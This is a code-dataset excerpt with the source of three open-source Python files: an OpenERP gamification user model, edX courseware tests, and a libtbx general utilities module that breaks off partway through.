repo_name (stringlengths 5..100) | path (stringlengths 4..299) | copies (stringclasses, 990 values) | size (stringlengths 4..7) | content (stringlengths 666..1.03M) | license (stringclasses, 15 values) | hash (int64, -9,223,351,895,964,839,000..9,223,297,778B) | line_mean (float64, 3.17..100) | line_max (int64, 7..1k) | alpha_frac (float64, 0.25..0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
vrenaville/OCB | addons/gamification/models/res_users.py | 386 | 4010 | # -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2013 OpenERP SA (<http://www.openerp.com>)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>
#
##############################################################################

from openerp.osv import osv
from challenge import MAX_VISIBILITY_RANKING


class res_users_gamification_group(osv.Model):
    """Update of res.users class
    - if adding groups to a user, check gamification.challenge linked to
      this group, and the user. This is done by overriding the write method.
    """
    _name = 'res.users'
    _inherit = ['res.users']

    def get_serialised_gamification_summary(self, cr, uid, excluded_categories=None, context=None):
        return self._serialised_goals_summary(cr, uid, user_id=uid, excluded_categories=excluded_categories, context=context)

    def _serialised_goals_summary(self, cr, uid, user_id, excluded_categories=None, context=None):
        """Return a serialised list of goals assigned to the user, grouped by challenge

        :excluded_categories: list of challenge categories to exclude in search

        [
            {
                'id': <gamification.challenge id>,
                'name': <gamification.challenge name>,
                'visibility_mode': <visibility {ranking,personal}>,
                'currency': <res.currency id>,
                'lines': [(see gamification_challenge._get_serialized_challenge_lines() format)]
            },
        ]
        """
        all_goals_info = []
        challenge_obj = self.pool.get('gamification.challenge')

        domain = [('user_ids', 'in', uid), ('state', '=', 'inprogress')]
        if excluded_categories and isinstance(excluded_categories, list):
            domain.append(('category', 'not in', excluded_categories))
        user = self.browse(cr, uid, uid, context=context)
        challenge_ids = challenge_obj.search(cr, uid, domain, context=context)
        for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
            # serialize goals info to be able to use it in javascript
            lines = challenge_obj._get_serialized_challenge_lines(cr, uid, challenge, user_id, restrict_top=MAX_VISIBILITY_RANKING, context=context)
            if lines:
                all_goals_info.append({
                    'id': challenge.id,
                    'name': challenge.name,
                    'visibility_mode': challenge.visibility_mode,
                    'currency': user.company_id.currency_id.id,
                    'lines': lines,
                })

        return all_goals_info

    def get_challenge_suggestions(self, cr, uid, context=None):
        """Return the list of challenges suggested to the user"""
        challenge_info = []
        challenge_obj = self.pool.get('gamification.challenge')
        challenge_ids = challenge_obj.search(cr, uid, [('invited_user_ids', 'in', uid), ('state', '=', 'inprogress')], context=context)
        for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
            values = {
                'id': challenge.id,
                'name': challenge.name,
                'description': challenge.description,
            }
            challenge_info.append(values)
        return challenge_info
| agpl-3.0 | 6,870,430,076,866,066,000 | 47.313253 | 148 | 0.604988 | false |
ampax/edx-platform-backup | lms/djangoapps/courseware/tests/test_courses.py | 12 | 9342 | # -*- coding: utf-8 -*-
"""
Tests for course access
"""
from django.conf import settings
from django.test.utils import override_settings
import mock
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.courses import (
get_course_by_id, get_cms_course_link, course_image_url,
get_course_info_section, get_course_about_section, get_cms_block_link
)
from courseware.tests.helpers import get_request_for_user
from student.tests.factories import UserFactory
import xmodule.modulestore.django as store_django
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.xml_importer import import_from_xml
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.django_utils import (
TEST_DATA_MOCK_MODULESTORE, TEST_DATA_MIXED_TOY_MODULESTORE
)
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.tests.xml import factories as xml
from xmodule.tests.xml import XModuleXmlImportTest
CMS_BASE_TEST = 'testcms'
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
class CoursesTest(ModuleStoreTestCase):
"""Test methods related to fetching courses."""
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
def test_get_cms_course_block_link(self):
"""
Tests that get_cms_course_link_by_id and get_cms_block_link_by_id return the right thing
"""
self.course = CourseFactory.create(
org='org', number='num', display_name='name'
)
cms_url = u"//{}/course/org/num/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_course_link(self.course))
cms_url = u"//{}/course/i4x://org/num/course/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_block_link(self.course, 'course'))
class ModuleStoreBranchSettingTest(ModuleStoreTestCase):
"""Test methods related to the modulestore branch setting."""
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='preview.localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_preview_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), ModuleStoreEnum.Branch.draft_preferred)
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_branch_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), 'fake_default_branch')
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
class MongoCourseImageTestCase(ModuleStoreTestCase):
"""Tests for course image URLs when using a mongo modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = CourseFactory.create(org='edX', course='999')
self.assertEquals(course_image_url(course), '/c4x/edX/999/asset/{0}'.format(course.course_image))
def test_non_ascii_image_name(self):
# Verify that non-ascii image names are cleaned
course = CourseFactory.create(course_image=u'before_\N{SNOWMAN}_after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before___after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_spaces_in_image_name(self):
# Verify that image names with spaces in them are cleaned
course = CourseFactory.create(course_image=u'before after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before_after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_static_asset_path_course_image_default(self):
"""
Test that without course_image being set, but static_asset_path
being set that we get the right course_image url.
"""
course = CourseFactory.create(static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/images/course_image.jpg'
)
def test_static_asset_path_course_image_set(self):
"""
Test that with course_image and static_asset_path both
being set, that we get the right course_image url.
"""
course = CourseFactory.create(course_image=u'things_stuff.jpg',
static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/things_stuff.jpg'
)
class XmlCourseImageTestCase(XModuleXmlImportTest):
"""Tests for course image URLs when using an xml modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = self.process_xml(xml.CourseFactory.build())
self.assertEquals(course_image_url(course), '/static/xml_test_course/images/course_image.jpg')
def test_non_ascii_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before_\N{SNOWMAN}_after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before_\N{SNOWMAN}_after.jpg')
def test_spaces_in_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before after.jpg')
@override_settings(MODULESTORE=TEST_DATA_MOCK_MODULESTORE)
class CoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content."""
# TODO: this test relies on the specific setup of the toy course.
# It should be rewritten to build the course it needs and then test that.
def setUp(self):
"""
Set up the course and user context
"""
super(CoursesRenderTest, self).setUp()
store = store_django.modulestore()
course_items = import_from_xml(store, self.user.id, TEST_DATA_DIR, ['toy'])
course_key = course_items[0].id
self.course = get_course_by_id(course_key)
self.request = get_request_for_user(UserFactory.create())
def test_get_course_info_section_render(self):
# Test render works okay
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertEqual(course_info, u"<a href='/c4x/edX/toy/asset/handouts_sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
@mock.patch('courseware.courses.get_request_for_thread')
def test_get_course_about_section_render(self, mock_get_request):
mock_get_request.return_value = self.request
# Test render works okay
course_about = get_course_about_section(self.course, 'short_description')
self.assertEqual(course_about, "A course about toys.")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_about = get_course_about_section(self.course, 'short_description')
self.assertIn("this module is temporarily unavailable", course_about)
@override_settings(MODULESTORE=TEST_DATA_MIXED_TOY_MODULESTORE)
class XmlCoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content for an XML course."""
toy_course_key = SlashSeparatedCourseKey('edX', 'toy', '2012_Fall')
def test_get_course_info_section_render(self):
course = get_course_by_id(self.toy_course_key)
request = get_request_for_user(UserFactory.create())
# Test render works okay. Note the href is different in XML courses.
course_info = get_course_info_section(request, course, 'handouts')
self.assertEqual(course_info, "<a href='/static/toy/handouts/sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(request, course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
| agpl-3.0 | -4,553,840,785,112,280,000 | 41.853211 | 112 | 0.676622 | false |
hickerson/bbn | fable/fable_sources/libtbx/utils.py | 1 | 43577 | from __future__ import division
from libtbx.queuing_system_utils import sge_utils, pbs_utils
from libtbx.str_utils import show_string
try: import gzip
except ImportError: gzip = None
try: import bz2
except ImportError: bz2 = None
try:
import hashlib
hashlib_md5 = hashlib.md5
except ImportError:
import md5
hashlib_md5 = md5.new
from stdlib import math
import warnings
import shutil
import glob
import time
import atexit
import traceback
import re
import sys, os
op = os.path
windows_device_names = """\
CON PRN AUX NUL COM1 COM2 COM3 COM4 COM5 COM6 COM7 COM8 COM9
LPT1 LPT2 LPT3 LPT4 LPT5 LPT6 LPT7 LPT8 LPT9""".split()
def xfrange(start, stop=None, step=None, tolerance=None):
"""A float range generator."""
if stop is None:
stop = start + 0.0
start = 0.0
else:
start += 0.0 # force it to be a float
if step is None:
step = 1.0
else:
assert step != 0.0
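# number of samples needed to cover the half-open interval [start, stop) with the given step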
count = int(math.ceil((stop - start) / step))
if ( tolerance is not None
and abs(start + count * step - stop) < abs(step * tolerance)):
count += 1
for i in xrange(count):
yield start + i * step
def frange(start, stop=None, step=None):
return list(xfrange(start, stop=stop, step=step))
def xsamples(start, stop=None, step=None, tolerance=1e-6):
return xfrange(start, stop, step, tolerance)
def samples(start, stop=None, step=None, tolerance=1e-6):
return list(xsamples(start, stop, step, tolerance))
def escape_sh_double_quoted(s):
"the result is supposed to be double-quoted when passed to sh"
if (s is None): return None
return s.replace('\\','\\\\').replace('"','\\"')
def xlen(seq):
if (seq is None): return seq
return len(seq)
def product(seq):
result = None
for val in seq:
if (result is None):
result = val
else:
result *= val
return result
def sequence_index_dict(seq, must_be_unique=True):
result = {}
for i,elem in enumerate(seq):
if (must_be_unique): assert elem not in result
result[elem] = i
return result
def number_from_string(string):
# similar to libtbx.phil.number_from_value_string
# (please review if making changes here)
if (string.lower() in ["true", "false"]):
raise ValueError(
'Error interpreting "%s" as a numeric expression.' % string)
try: return int(string)
except KeyboardInterrupt: raise
except Exception: pass
try: return eval(string, math.__dict__, {})
except KeyboardInterrupt: raise
except Exception:
raise ValueError(
'Error interpreting "%s" as a numeric expression: %s' % (
string, format_exception()))
def gzip_open(file_name, mode):
assert mode in ["r", "rb", "w", "wb", "a", "ab"]
if (gzip is None):
un = ""
if (mode[0] == "r"): un = "un"
raise RuntimeError(
"gzip module not available: cannot %scompress file %s"
% (un, show_string(file_name)))
return gzip.open(file_name, mode)
def bz2_open(file_name, mode):
assert mode in ('r', 'w')
if bz2 is None:
raise RuntimeError('bz2 module not available: cannot %scompress file %s'
% ({'r':'un', 'w':''}[mode], file_name))
return bz2.BZ2File(file_name, mode)
def warn_if_unexpected_md5_hexdigest(
path,
expected_md5_hexdigests,
hints=[],
out=None):
m = hashlib_md5()
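# hash the file with normalized line endings so the digest is independent of the platform's line terminators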
m.update("\n".join(open(path).read().splitlines()))
current_md5_hexdigest = m.hexdigest()
if (m.hexdigest() in expected_md5_hexdigests): return False
warning = "Warning: unexpected md5 hexdigest:"
file_name = " File: %s" % show_string(path)
new_hexdigest = " New md5 hexdigest: %s" % m.hexdigest()
width = max([len(s) for s in [warning, file_name, new_hexdigest]])
if (out is None): out = sys.stdout
print >> out, "*"*width
print >> out, warning
print >> out, file_name
print >> out, new_hexdigest
for hint in hints:
print >> out, hint
print >> out, "*"*width
return True
def get_memory_from_string(mem_str):
if type(mem_str)==type(1): return mem_str
if type(mem_str)==type(1.): return mem_str
mem_str = mem_str.replace(" ","").strip().upper()
if mem_str == "": return 0
factor=1024
for i, greek in enumerate(["K","M","G","T","E","Z","Y"]):
num_str=None
if mem_str[-1]==greek:
num_str = mem_str[:-1]
if mem_str.find("%sB" % greek)==len(mem_str)-2:
num_str = mem_str[:-2]
if num_str is not None:
try:
num = float(num_str)
except ValueError, e:
raise RuntimeError("""
The numerical portion of %s is not a valid float
""" % mem_str)
break
factor*=1024
else:
try:
num = int(mem_str)
except ValueError, e:
raise RuntimeError("""
There is no memory unit or valid float in %s
""" % mem_str)
factor=1
return num*factor
def getenv_bool(variable_name, default=False):
value = os.environ.get(variable_name, None)
if (value is None): return default
value_lower = value.lower()
if (value_lower not in ["false", "true", "0", "1"]):
raise Sorry(
'Environment variable %s must be "True", "False", "0", or "1"'
' (current value: "%s").' % (variable_name, value))
return (value_lower in ["true", "1"])
def file_size(file_name):
return os.stat(file_name).st_size
def copy_file(source, target, compress=None):
assert op.isfile(source)
if (op.isdir(target)):
target = op.join(target, op.basename(source))
if (compress is None):
t = open(target, "wb")
else:
assert compress == ".gz"
t = gzip_open(file_name=target+compress, mode="wb")
t.write(open(source, "rb").read())
del t
def remove_files(pattern=None, paths=None, ensure_success=True):
assert [pattern, paths].count(None) == 1
if (paths is None):
paths = glob.glob(pattern)
for path in paths:
if (ensure_success):
if (op.exists(path)):
os.remove(path)
if (op.exists(path)):
raise RuntimeError("Cannot remove file: %s" % show_string(path))
else:
if (op.isfile(path)):
os.remove(path)
def find_files (dir_name, pattern="*", files_only=True) :
assert os.path.isdir(dir_name) and (pattern is not None)
regex = re.compile(pattern)
files = os.listdir(dir_name)
matching_files = []
for file_name in files :
full_path = os.path.join(dir_name, file_name)
if (files_only) and (not os.path.isfile(full_path)) :
continue
if (regex.search(file_name) is not None) :
matching_files.append(full_path)
return matching_files
def sort_files_by_mtime (file_names=None, dir_name=None, reverse=False) :
assert ([file_names, dir_name].count(None) == 1)
if (dir_name is not None) :
assert os.path.isdir(dir_name)
file_names = [ os.path.join(dir_name, fn) for fn in os.listdir(dir_name) ]
files_and_mtimes = []
for file_name in file_names :
files_and_mtimes.append((file_name, os.path.getmtime(file_name)))
files_and_mtimes.sort(lambda x,y: cmp(x[1], y[1]))
if (reverse) :
files_and_mtimes.reverse()
return [ file_name for file_name, mtime in files_and_mtimes ]
def tupleize(x):
try:
return tuple(x)
except KeyboardInterrupt: raise
except Exception:
return (x,)
def plural_s(n, suffix="s"):
if (n == 1): return n, ""
return n, suffix
def n_dim_index_from_one_dim(i1d, sizes):
assert len(sizes) > 0
result = []
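# extract indices from the fastest-varying (last) dimension first, then reverse the order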
for sz in reversed(sizes):
assert sz > 0
result.append(i1d % sz)
i1d //= sz
result.reverse()
return result
def flat_list(nested_list):
result = []
if (hasattr(nested_list, "__len__")):
for sub_list in nested_list:
result.extend(flat_list(sub_list))
else:
result.append(nested_list)
return result
def select_matching(key, choices, default=None):
for key_pattern, value in choices:
m = re.search(key_pattern, key)
if m is not None: return value
return default
class Keep: pass
class Sorry(Exception):
"""
Basic exception type for user errors; the traceback will be suppressed.
"""
__orig_module__ = __module__
# trick to get just "Sorry" instead of "libtbx.utils.Sorry"
__module__ = Exception.__module__
def reset_module (self) :
self.__class__.__module__ = self.__class__.__orig_module__
disable_tracebacklimit = "LIBTBX_DISABLE_TRACEBACKLIMIT" in os.environ
__prev_excepthook = sys.excepthook
def sorry_excepthook(type, value, traceback):
tb_off = (not disable_tracebacklimit and isinstance(value, Sorry))
if (tb_off):
class __not_set(object): pass
prev_tracebacklimit = getattr(sys, "tracebacklimit", __not_set)
sys.tracebacklimit = 0
result = __prev_excepthook(type, value, traceback)
if (tb_off):
if (prev_tracebacklimit is __not_set):
del sys.tracebacklimit
else:
sys.tracebacklimit = prev_tracebacklimit
return result
sys.excepthook = sorry_excepthook
class Usage(Sorry):
"""
Subclass of Sorry, for printing out usage instructions upon program
invocation without arguments (or --help, etc.).
"""
__module__ = Exception.__module__
class Abort(Sorry) :
"""
Subclass of Sorry, primarily used in the Phenix GUI in response to user
input.
"""
__module__ = Exception.__module__
class Failure(Sorry) :
__module__ = Exception.__module__
def detect_multiprocessing_problem():
vers_info = sys.version_info[:2]
if (vers_info < (2,6)):
return "multiprocessing module not available:" \
" Python 2.6 or higher is required" \
" (version currently in use: %d.%d)" % vers_info
import libtbx.load_env
if (libtbx.env.has_module("omptbx")) :
import omptbx
if (omptbx.omp_version is not None) :
return "multiprocessing is not compatible with OpenMP"
sem_open_msg = "This platform lacks a functioning sem_open implementation"
pool = None
try:
try:
import multiprocessing
pool = multiprocessing.Pool(processes=2)
pool.map(func=abs, iterable=range(2), chunksize=1)
except ImportError, e:
if (not str(e).startswith(sem_open_msg)):
raise
return "multiprocessing import error: " + sem_open_msg
finally:
if (pool is not None):
pool.close()
pool.join()
return None
def if_none(value, default):
if (value is None): return default
return value
def format_exception():
ei = sys.exc_info()
type_ = ei[0].__name__
value = str(ei[1])
if (value != ""):
value = value.replace(" (<string>, line ", " (line ")
else:
file_name, line = traceback.extract_tb(sys.exc_info()[2], 1)[0][:2]
if (file_name is not None):
value = file_name+" "
if (line is not None):
value += "line %d" % line
return ("%s: %s" % (type_, value)).rstrip()
def show_exception_info_if_full_testing(prefix="EXCEPTION_INFO: "):
import libtbx.load_env
if ( not libtbx.env.full_testing
and not disable_tracebacklimit):
return
from libtbx import introspection
from cStringIO import StringIO
sio = StringIO()
introspection.show_stack(out=sio)
traceback.print_exc(file=sio)
msg = "\n".join([prefix+line for line in sio.getvalue().splitlines()]) + "\n"
del sio
done = []
for out in [sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__]:
def is_done():
for o in done:
if (o is out): return True
return False
if (is_done()): continue
out.write(msg)
flush = getattr(out, "flush", None)
if (flush is not None): flush()
done.append(out)
return msg
def base36_encode(integer, width=None):
digit_set = "0123456789abcdefghijklmnopqrstuvwxyz"
digits = []
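# repeated division by 36; the remainders are the base-36 digits, least significant first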
while (integer != 0):
integer, i = divmod(integer, 36)
digits.append(digit_set[i])
if (width is not None):
while (len(digits) < width):
digits.append("0")
digits.reverse()
return "".join(digits)
def base36_timestamp(seconds_since_epoch=None, multiplier=1000, width=10):
s = seconds_since_epoch
if (s is None):
s = time.time()
return base36_encode(integer=int(s * multiplier + 0.5), width=width)
def date_and_time():
seconds_since_epoch = time.time()
localtime = time.localtime(seconds_since_epoch)
if (time.daylight and localtime[8] != 0):
tzname = time.tzname[1]
offs = -time.altzone
else:
tzname = time.tzname[0]
offs = -time.timezone
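# append the timezone name, the UTC offset formatted as +/-HHMM, and raw seconds since the epoch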
return time.strftime("Date %Y-%m-%d Time %H:%M:%S", localtime) \
+ " %s %+03d%02d (%.2f s)" % (
tzname, offs//3600, offs//60%60, seconds_since_epoch)
class timer_base(object):
def __init__(self):
self.t = self.get()
def elapsed(self):
t = self.get()
d = t - self.t
return d
def delta(self):
t = self.get()
d = t - self.t
self.t = t
return d
def show_elapsed(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.elapsed()
def show_delta(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.delta()
class user_plus_sys_time(timer_base):
def get(self):
t = os.times()
return t[0] + t[1]
class wall_clock_time(timer_base):
""" motivation: when running multithreaded code, user_plus_sys_time
would report the cumulated times for all threads: not very useful
to analyse the scaling with the number of threads! Wall clock time, although
it is less reliable is the only solution in that case """
def get(self):
return time.time()
class time_log(object):
def __init__(self, label, use_wall_clock=False):
self.label = label
self.use_wall_clock = use_wall_clock
self.accumulation = 0
self.n = 0
self.delta = 0
self.timer = None
def start(self):
if (self.use_wall_clock):
self.timer = wall_clock_time()
else:
self.timer = user_plus_sys_time()
return self
def stop(self):
self.delta = self.timer.delta()
self.timer = None
self.accumulation += self.delta
self.n += 1
def average(self):
return self.accumulation / max(1,self.n)
def log(self):
self.stop()
return self.report()
def log_elapsed(self, local_label):
return "time_log: %s: %.2f elapsed %s" % (
self.label, self.timer.elapsed(), local_label)
legend = "time_log: label: n accumulation delta average"
def report(self):
assert self.timer is None
return "time_log: %s: %d %.2f %.3g %.3g" % (
self.label, self.n, self.accumulation,
self.delta, self.average())
def human_readable_time(time_in_seconds):
time_units = time_in_seconds
time_unit = "seconds"
if (time_units > 120):
time_units /= 60
time_unit = "minutes"
if (time_units > 120):
time_units /= 60
time_unit = "hours"
if (time_units > 48):
time_units /= 24
time_unit = "days"
return time_units, time_unit
def human_readable_time_as_seconds(time_units, time_unit):
if (isinstance(time_units, str)): time_units = float(time_units)
if (time_unit == "seconds"): return time_units
if (time_unit == "minutes"): return time_units*60
if (time_unit == "hours"): return time_units*60*60
if (time_unit == "days"): return time_units*60*60*24
raise RuntimeError("Unknown time_unit: %s" % time_unit)
def format_timestamp_12_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return replace_with
elif short :
return time.strftime("%d-%m-%y %I:%M %p", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %I:%M %p", time.localtime(float(unix_time)))
def format_timestamp_24_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return "unknown"
elif short :
return time.strftime("%d-%m-%y %H:%M", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %H:%M", time.localtime(float(unix_time)))
format_timestamp = format_timestamp_12_hour
def format_cpu_times(show_micro_seconds_per_tick=True):
t = os.times()
result = "u+s,u,s: %.2f %.2f %.2f" % (t[0] + t[1], t[0], t[1])
if (show_micro_seconds_per_tick):
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
result += " micro-seconds/tick: %.3f" % ((t[0]+t[1])/python_ticker*1.e6)
return result
def show_total_time(
out=None,
show_micro_seconds_per_bytecode_instruction=True):
if (out == None): out = sys.stdout
total_time = user_plus_sys_time().get()
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
print >> out, "Time per interpreted Python bytecode instruction:",
print >> out, "%.3f micro seconds" % (total_time / python_ticker * 1.e6)
print >> out, "Total CPU time: %.2f %s" % human_readable_time(total_time)
def show_wall_clock_time(seconds, out=None):
if (out is None): out = sys.stdout
print >> out, "wall clock time:",
if (seconds < 120):
print >> out, "%.2f seconds" % seconds
else:
m = int(seconds / 60 + 1.e-6)
s = seconds - m * 60
print >> out, "%d minutes %.2f seconds (%.2f seconds total)" % (
m, s, seconds)
out_flush = getattr(out, "flush", None)
if (out_flush is not None):
out_flush()
class show_times:
def __init__(self, time_start=None, out=None):
if (time_start is None):
t = os.times()
self.time_start = time.time() - (t[0] + t[1])
elif (time_start == "now"):
self.time_start = time.time()
else:
self.time_start = -(0-time_start) # be sure time_start is a number
self.out = out
def __call__(self):
out = self.out
if (out is None): out = sys.stdout
t = os.times()
usr_plus_sys = t[0] + t[1]
try: ticks = sys.gettickeraccumulation()
except AttributeError: ticks = None
s = "usr+sys time: %.2f seconds" % usr_plus_sys
if (ticks is not None):
s += ", ticks: %d" % ticks
if (ticks != 0):
s += ", micro-seconds/tick: %.3f" % (usr_plus_sys*1.e6/ticks)
print >> out, s
show_wall_clock_time(seconds=time.time()-self.time_start, out=out)
def show_times_at_exit(time_start=None, out=None):
atexit.register(show_times(time_start=time_start, out=out))
class host_and_user:
def __init__(self):
self.host = os.environ.get("HOST")
self.hostname = os.environ.get("HOSTNAME")
self.computername = os.environ.get("COMPUTERNAME")
self.hosttype = os.environ.get("HOSTTYPE")
self.processor_architecture = os.environ.get("PROCESSOR_ARCHITECTURE")
self.machtype = os.environ.get("MACHTYPE")
self.ostype = os.environ.get("OSTYPE")
self.vendor = os.environ.get("VENDOR")
self.user = os.environ.get("USER")
self.username = os.environ.get("USERNAME")
self.homedir = None
if (os.name == "nt") :
homedrive = os.environ.get("HOMEDRIVE")
homepath = os.environ.get("HOMEPATH")
if (not None in [homedrive, homepath]) :
self.homedir = os.path.join(homedrive, homepath)
else :
self.homedir = os.environ.get("HOME")
getpid = getattr(os, "getpid", None)
if (getpid is None):
self.pid = None
else:
self.pid = getpid()
self.sge_info = sge_utils.info()
self.pbs_info = pbs_utils.chunk_info()
def get_user_name (self) :
if (self.user is not None) :
return self.user
else :
return self.username
def get_host_name (self) :
if (self.host is not None) :
return self.host
elif (self.hostname is not None) :
return self.hostname
elif (self.computername is not None) :
return self.computername
return None
def show(self, out=None, prefix=""):
if (out is None): out = sys.stdout
if (self.host is not None):
print >> out, prefix + "HOST =", self.host
if ( self.hostname is not None
and self.hostname != self.host):
print >> out, prefix + "HOSTNAME =", self.hostname
if ( self.computername is not None
and self.computername != self.host):
print >> out, prefix + "COMPUTERNAME =", self.computername
if (self.hosttype is not None):
print >> out, prefix + "HOSTTYPE =", self.hosttype
if (self.processor_architecture is not None):
print >> out, prefix + "PROCESSOR_ARCHITECTURE =", \
self.processor_architecture
if ( self.hosttype is None
or self.machtype is None
or self.ostype is None
or "-".join([self.machtype, self.ostype]) != self.hosttype):
if (self.machtype is not None):
print >> out, prefix + "MACHTYPE =", \
self.machtype
if (self.ostype is not None):
print >> out, prefix + "OSTYPE =", \
self.ostype
if (self.vendor is not None and self.vendor != "unknown"):
print >> out, prefix + "VENDOR =", \
self.vendor
if (self.user is not None):
print >> out, prefix + "USER =", self.user
if ( self.username is not None
and self.username != self.user):
print >> out, prefix + "USERNAME =", self.username
if (self.pid is not None):
print >> out, prefix + "PID =", self.pid
self.sge_info.show(out=out, prefix=prefix)
self.pbs_info.show(out=out, prefix=prefix)
def allow_delete_directory (target_dir) :
"""
Check for specified reserved directories which are standard on many systems;
these should never be deleted as part of any program.
"""
homedir = host_and_user().homedir
safe_dirs = [
homedir,
os.path.join(homedir, "Documents"),
os.path.join(homedir, "Desktop"),
os.path.join(homedir, "Downloads"),
os.path.join(homedir, "Library"),
os.path.join(homedir, "Movies"),
os.path.join(homedir, "data"),
"/",
"/home",
"/Users",
]
target_dir = os.path.abspath(target_dir)
for safe_dir in safe_dirs :
if (target_dir == safe_dir) :
return False
return True
def _indentor_write_loop(write_method, indent, incomplete_line, lines):
for line in lines:
if (len(line) == 0):
incomplete_line = False
elif (incomplete_line):
write_method(line)
incomplete_line = False
else:
write_method(indent)
write_method(line)
write_method("\n")
class indentor(object):
def __init__(self, file_object=None, indent="", parent=None):
if (file_object is None):
if (parent is None):
file_object = sys.stdout
else:
file_object = parent.file_object
self.file_object = file_object
if (hasattr(self.file_object, "flush")):
self.flush = self._flush
self.indent = indent
self.parent = parent
self.incomplete_line = False
def write(self, block):
if (len(block) == 0): return
if (block.endswith("\n")):
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=block.splitlines())
self.incomplete_line = False
else:
lines = block.splitlines()
if (len(lines) == 1):
if (self.incomplete_line):
self.file_object.write(lines[-1])
else:
self.file_object.write(self.indent + lines[-1])
else:
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=lines[:-1])
self.file_object.write(self.indent + lines[-1])
self.incomplete_line = True
def _flush(self):
self.file_object.flush()
def shift_right(self, indent=" "):
return self.__class__(indent=self.indent+indent, parent=self)
class buffered_indentor(indentor):
def __init__(self, file_object=None, indent="", parent=None):
indentor.__init__(self, file_object, indent, parent)
self.buffer = []
def write(self, block):
self.buffer.append(block)
def write_buffer(self):
if (self.parent is not None):
self.parent.write_buffer()
for block in self.buffer:
indentor.write(self, block)
self.buffer = []
class null_out(object):
"""Pseudo-filehandle for suppressing printed output."""
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): pass
def writelines(self, sequence): pass
class raise_if_output(object):
"example use: sys.stdout = raise_if_output()"
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): raise RuntimeError
def writelines(self, sequence): raise RuntimeError
class multi_out(object):
"""
Multiplexing output stream, e.g. for simultaneously printing to stdout
and a logfile.
"""
def __init__(self):
self.labels = []
self.file_objects = []
self.atexit_send_to = []
self.closed = False
self.softspace = 0
atexit.register(self._atexit)
